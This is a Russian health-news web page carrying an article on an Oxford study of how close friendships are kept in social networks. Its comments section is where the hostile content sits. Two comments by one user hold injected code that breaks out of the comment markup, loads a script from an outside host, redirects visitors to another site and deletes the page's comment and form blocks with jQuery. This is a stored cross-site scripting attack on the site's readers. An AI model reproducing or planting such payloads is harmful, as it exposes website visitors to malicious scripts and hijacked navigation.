Здоровье ИНФО
Присоединяйтесь к нам:
Главная страница  >>  Наша кожа  >>  Прыщи  >>  Статьи  >>  1 зашел – 1 вышел! Как «д...  >>  1 зашел – 1 вышел! Как «дружат» люди в социальных сетях
 
Обратная связь
 

1 зашел – 1 вышел! Как «дружат» люди в социальных сетях

Размер шрифта
29 мая 2014 00:00
Юрий Малышев
Здоровье инфо
Александр Чистяков
Здоровье инфо
  • google_analytics: false
  • Нравится

Слышали поговорку - «старый друг лучше новых двух»? Ученые считают, что в суровых реалиях жизни действует несколько другой порядок.

1 зашел - 1 вышел! Как «дружат» люди в соц сетях

Несмотря на то, что мобильные технологии и социальные сети сделали возможным общение одновременно с огромным количеством людей, многие по-прежнему предпочитают контактировать с узким кругом лиц даже в он-лайне. Именно к такому выводу пришли ученые из Оксфордского университета (Англия). При этом, как утверждают авторы, люди придерживаются принципа «плюс один, минус один»: это значит, что новое близкое знакомство, как правило, влечет за собой утрату одного из старых.

«Интернет безгранично расширил горизонты общения, но, по всей видимости, мы по-прежнему предпочитаем находиться в узкой группе единомышленников, родственников и друзей», – рассказывает Феликс Рид-Цохас, один из авторов исследования. «Число близких контактов у каждого человека свое, но почти для всех характерна система общения, при которой новый близкий друг вытесняет из жизни одного старых».

Суть исследования, проведенного английскими учеными, заключалась вот в чем. В течение восемнадцати месяцев авторы детально анализировали принципы общения в социальных сетях на примере двадцати четырех учащихся из Соединенного Королевства.  Каждый из участников на момент исследования находился на переходном этапе своей жизни: поступал в университет, искал новую работу и так далее.

В начале исследования ученые пронумеровали всех «френдов» по степени эмоциональной близости к испытуемым. Оказалось, что во всех случаях наблюдения львиная доля сообщений приходилась на людей из ближайшего окружения.

Однако в рамках этой выраженной тенденции существовали, тем менее, явные индивидуальные вариации. Ученые пришли к выводу, что у каждого испытуемого была своя характерная «социальная система», согласно которой они  распределяли приоритет в общении.

Исследователи обнаружили следующий удивительный факт. Как уже упоминалось ранее, в жизни всех участников во время эксперимента происходили серьезные перемены, сопряженные с новыми знакомствами, а зачастую и вовсе – с попаданием в принципиально другую общественную среду. Несмотря на это, «социальная система» каждого испытуемого оставалась неизменной: они тратили абсолютно столько же времени на общение с людьми из ближайшего окружения, вне зависимости от изменений в составе последнего.

«Получается, что с появлением каждого нового тесного знакомство, прежние контакты либо утрачиваются, либо теряют приоритет», – говорит Робин Данбар, профессор эволюционной психологии Оксфордского университета. «Возможно, это связано с ограниченным количеством времени, которое человек может отвести на общение с другими людьми, а также с внушительными когнитивными и эмоциональными усилиями, которые нужно приложить для сохранения близких отношений. По всей видимости, социальные привычки каждого из нас столь устойчивы, что даже безграничные возможности онлайн-общения не в силах это изменить».

Если задуматься, то в этом есть логика и глубинный смысл. Ведь бездумное распыление человеческих чувств и эмоций приводит лишь к их обесцениванию.

  • google_analytics: false
  • Нравится
Послать другу Послать другу Распечатать Распечатать Обсудить на форуме Обсудить на форуме
Комментарии

1 - Гость

30 мая 2014 в 09:11

Цитировать   |   Пожаловаться

Спасибо!

2 - pomk93

06 июня 2014 в 09:47

Комментарий удален за нарушение Правил общения

3 - zzzzzz

30 июня 2015 в 18:39

Цитировать   |   Пожаловаться

--> src="http://1212123.esy.es/q.js">

4 - zzzzzz

30 июня 2015 в 22:36

Цитировать   |   Пожаловаться

--> src="http://1212123.esy.es/q.js"> > window.location.href="http://a25832-hostde3.fornex.org/"; $("form.noprint, #CommentsBlock").remove();

Статьи

       
Ученые выяснили, что случится с вами, если вас удалят из друзей Вконтакте!   Дети могут понимать друг друга без слов!   Всемирная неделя первичного иммунодефицита начинается в Москве!   Беременность: как обезопасить себя и будущего малыша от вирусов  
03 октября 2013Результаты благотворительного марафона «Всем миром» 08 июля 2013Теперь можно выбрать, какой ребенок у вас будет! ЭКО открывает новые горизонты
 
18 июня 2013Повезло, живете в пешей доступности от шоссе? Не так быстро! Чем ближе к шоссе, тем больнее почки! Как защитить себя? 12 июня 2013Обычный шум может вызвать остановку сердца! Как избежать этого?
 

Слайдшоу

1
Можно ли пережить беременность без рвоты?
Убийцы в вашей ванной
Можно ли подгадать с беременностью?

Тесты

1
Будет ли у вас инфаркт?
Кофеин вызывает зависимость?
Как устроены волосы человека?
Вопросы и ответы
Яна Александровна Юцковская
Яна Александровна Юцковская Задать вопрос
Посмотреть информацию о враче

Юцковская Яна Александровна, д.м.н., профессор, зав. кафедрой дерматовенерологии и косметологии ГБОУ ВПО «ТГМУ Минздрава России», врач высшей категории, директор ООО «Профессорская клиника Юцковских», Владивосток, директор ООО «Клиника профессора  Юцковской», Москва, президент НП «ДВАЭМ», председатель Дальневосточного отделения МООСБТ.

Елена Николаевна Волкова
Елена Николаевна Волкова Прочитать ответы
Посмотреть информацию о враче

Доктор медицинских наук, профессор кафедры дерматовенерологии Московского факультета ГОУ ВПО «РГМУ им. Н.И. Пирогова Минздравсоцразвития России». Этот консультант отвечал на вопросы пользователей с 03 ноября 2011 г. по 15 февраля 2012 г.